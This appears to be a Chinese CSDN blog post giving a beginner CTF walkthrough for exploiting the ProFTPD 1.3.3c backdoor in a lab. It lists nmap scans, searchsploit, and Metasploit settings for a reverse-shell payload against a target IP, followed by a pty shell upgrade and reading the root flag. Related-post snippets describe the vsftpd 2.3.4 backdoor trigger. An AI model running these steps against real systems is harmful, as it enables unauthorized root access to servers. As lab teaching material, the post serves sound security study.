4-1CTF夺旗入门教程--FTP服务后门利用

最新推荐文章于 2024-08-26 23:21:52 发布
最新推荐文章于 2024-08-26 23:21:52 发布
阅读量549 收藏 2
点赞数
分类专栏: CTF学习 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105162889
版权
1.信息探测
#开放服务信息
nmap -sV 192.168.2.113
#挖掘全部信息
nmpa -A -v -T4 192.168.2.113
2.查找对应漏洞
#对应FTP版本为ProFTPD 1.3.3c
#查找对应漏洞
searchsploit ProFTPD 1.3.3c
3.使用metasploit进行溢出
msfconsole
#输入search对应的软件及版本号
>search ProFTPD 1.3.3c
#exploit/unix/ftp/proftpd_133c_backdoor
>use exploit
>show payloads
#set payload
>set payload cmd/unix/reverse
>show options
#set rhosts
>set rhosts 192.168.2.113
#set lhost
>set lhost 192.168.2.110
>exploit
>id
#获取root权限

优化会话显示带用户、目录的命令行界面

python -c "import pty;pty.spawn('/bin/bash')"
4.获取flag
cd /root/
ls
cat flag.txt
#测试文档、总结文档
writeup
5.总结

对于开放FTP、SSH、Telnet服务的系统,可以尝试一些对应服务版本的漏洞代码

The Riddler.
关注
专栏目录
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3286
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
FTP服务后门
qq_44813849的博客
06-08 1053
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。 通过扫描靶机IP为:192.168.174.131 攻击机IP为:192.168.174.128 扫描主机服务信息以及服务版本 可以使用searchsploit来查看对应的版本该服务有没有可利用的漏洞 发现了两个利用漏洞,并...
ftp服务后门
rlenew的博客
05-28 572
主机:192.168.136.133 靶机:192.168.136.128 用nmap扫靶机 先对21端口入手,用msf查看该版本漏洞 这里利用exploit/unix/ftp/proftpd_133c_backdoor版本后门漏洞渗透,设置参数然后run 直接入侵,查看权限。
ftp服务后门利用
Vinson的博客
09-24 688
FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。 searchsploit +版本 查看漏洞信息,找到可利用的溢出代码 需要修改这个文件造成溢出 使用Metasploit进行溢出(用msfconsole打开) 1、输入search对应软件和版本号 2、use exploit 3、查看可以使...
渗透测试---FTP服务后门
tzyyyyyy的博客
11-03 801
利用FTP服务后门漏洞 通过使用Metasploit框架进行渗透测试 并且取得root最高权限
FTP服务后门利用
小锤队长的博客
10-30 1559
靶场: ubuntu 192.168.142.128 攻击机: kali 192.168.11.165 信息收集: 探测服务信息: nmap -sV 192.168.142.128 可以看到靶机开启了 21 ftp服务,版本号为ProFTPD 1.3.3c 使用 searchsploit 查看漏洞信息,找到可以利用的溢出代码 可以看到有两个可以用的漏洞, 第一个是 远...
CTF从入门到提升(十一)文件包含
anquanniu的博客
09-09 740
​​ Include stdio.h Import request 很多网站的admin(管理员)入口和user(用户)入口是分开的,登陆过程所调用的函数可能都是同一个函数,最后操作的表不同。如果调用的是同一个函数,网站一般分开两个文件存储:admin目录和user目录。在不同文件中,如果没有使用“文件包含”这个操作,同一个函数就会出现在两个文件中增加重复工作的工作量。但是如果使用“文件包含”...
CTF中的取证分析:数字证据的收集与解读
最新发布
weixin_65409651的博客
08-26 1034
取证分析(Forensics)在CTF竞赛中模拟了数字证据的收集与分析过程。取证的目标是从系统、网络、文件等数据中提取关键信息,用以恢复事件的全过程或发现隐藏的证据。取证分析不仅仅是在CTF中的挑战,也是真实网络安全事件响应中的重要步骤。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5680
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
CTF FTP服务后门利用
Kstheme的博客
08-19 880
工具: 靶机 kali linux 操作步骤: FTP介绍 FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:“下载”...
FTP服务后门实战
Fly_鹏程万里
12-15 807
ProFTPD是一种高度可定制和可扩展的FTP服务器软件,它提供了一种安全和可靠的方式来传输文件和数据,它支持多种操作系统,包括类Unix系统(例如:Linux、FreeBSD等)和Windows,在其1.3.3c软件包中存在一处命令执行的后门漏洞,攻击者可以直接进行命令执行获取服务器端的Shell权限。
CTF--8.FTP服务后门利用
woo233的博客
09-13 943
FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载”(Download)和上传(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上,"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。
CTF-FTP服务后门利用
zhangpeng999123的博客
06-01 917
环境 Kali ip 192.168.1.17 SSH靶机ip 192.168.1.18 FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。 同样开始用netdiscover发现靶机ip后,用nmap探测开启的端口或服务。 发现开启了ssh,http和ftp这三个服务。 我们发现了ftp的版本号,我们可...
FTP后门漏洞复现(含有漏洞的vsftpd2.3.4)
顾蒅' Home
09-12 7281
FTP后门漏洞复现 0x01 漏洞简述 vsftpd-2.3.4 手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输
CTF-FTP后门利用
不知名白帽的博客
08-19 1605
CTF-FTP后门利用
新手指南:CTF夺旗赛入门与知名团队解析
CTF(Capture The Flag,中文常称为夺旗赛)是一种网络安全竞赛活动,起源于1996年的DEFCON全球黑客大会,其目的是让网络安全技术人员在一种安全可控的环境中展示技能,而不是通过实际攻击彼此。这种比赛形式取代了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值